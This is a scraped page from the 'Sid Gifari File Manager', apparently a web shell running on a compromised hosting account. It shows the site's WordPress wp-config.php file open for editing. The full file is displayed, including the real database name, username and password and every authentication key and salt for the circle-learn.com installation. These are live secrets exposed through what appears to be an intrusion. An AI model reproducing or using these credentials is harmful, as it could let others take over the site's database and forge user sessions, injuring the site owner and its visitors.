Sid Gifari File Manager
🏠 Root
/
home
/
u403571817
/
domains
/
circle-learn.com
/
public_html
/
Editing: wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'u403571817_KvGKN' ); /** Database username */ define( 'DB_USER', 'u403571817_SFVXQ' ); /** Database password */ define( 'DB_PASSWORD', 'z4UmTJRgJz' ); /** Database hostname */ define( 'DB_HOST', '127.0.0.1' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '$t4$Mfcm;x._FV%;N~@_*lH(/vAEzmo}[fyu~_SpQX~s 0kS51.]CrctVTfqKLke' ); define( 'SECURE_AUTH_KEY', '&,3yM;I$c0fOLbKYp#n*6FX{zKzoJAQb4Os^!a7AHV!%x*ip<mA6q8<P7V5HN>cc' ); define( 'LOGGED_IN_KEY', '/Sval*,#|47{R_v}Cz2&oxz++:-CaX-T@1o(}nocBwcJV1FE{=`{,OcWrI4]Rn*Q' ); define( 'NONCE_KEY', '>J=`Oe>N%aIOW>.wF`)S.Ekr1DZ;q#G#UFcC:M~y0VRy_#D8q!Vfx3Z1uZ<JuG;o' ); define( 'AUTH_SALT', 'HNMVF3@TCLBE|gUxjczIRxUu#?.p%tAzC0*y o$X]ka`-)S9,glrvQs^H9>:}&1r' ); define( 'SECURE_AUTH_SALT', 'R[F.ejKN2Dp)eat4qtq`~[G[n#uKr*~6h{%(o2y}$Ewq+a4Jl[u-fdVK9EUB_,)t' ); define( 'LOGGED_IN_SALT', 'r})J/B+GSh7kNS7/f@3|U&m0F#NX$vq}D}ab%3uQ&Em24wTnl]Rqra~ }1*4nA {' ); define( 'NONCE_SALT', 'zMSzRuZ./Y5@M26S!H6Bj!A=KL+e/$$F2F4$Z&h]-2D|8lK&lq(d@^ W<suQ93<Z' ); define( 'WP_CACHE_KEY_SALT', 'eXMoz=YzI2*_@e0tEQq4;>q1P6YWK#^2iHE`qh<,sl=@6VNqX5zAZwLSzR@5&amq' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* Add any custom values between this line and the "stop editing" line. */ /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'FS_METHOD', 'direct' ); define( 'COOKIEHASH', '1efb566258858d5b84261dc18e883775' ); define( 'WP_AUTO_UPDATE_CORE', 'minor' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); require_once ABSPATH . 'wp-settings.php';
Save
Cancel